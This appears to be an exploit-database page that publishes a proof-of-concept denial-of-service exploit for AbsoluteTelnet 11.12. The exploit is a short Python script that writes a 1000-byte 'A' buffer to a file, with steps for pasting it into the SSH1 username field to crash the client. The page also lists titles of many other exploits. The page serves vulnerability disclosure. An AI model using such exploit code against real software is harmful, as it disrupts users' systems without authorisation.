Search for hundreds of thousands of exploits

"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)"

Author

Exploit author

chuyreds

Platform

Exploit platform

windows

Release date

Exploit published date

2020-04-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2020-04-10"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)"doswindowschuyreds
2020-04-07"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"Memu Play 7.1.3 - Insecure Folder Permissions"localwindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)"doswindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)"doswindowschuyreds
2019-11-26"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)"doswindowschuyreds
2019-11-25"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)"doswindowschuyreds
2019-11-18"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)"doswindowschuyreds
2019-11-12"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path"localwindowschuyreds
2019-11-12"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path"localwindowschuyreds
2019-11-12"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path"localwindowschuyreds
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48305/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.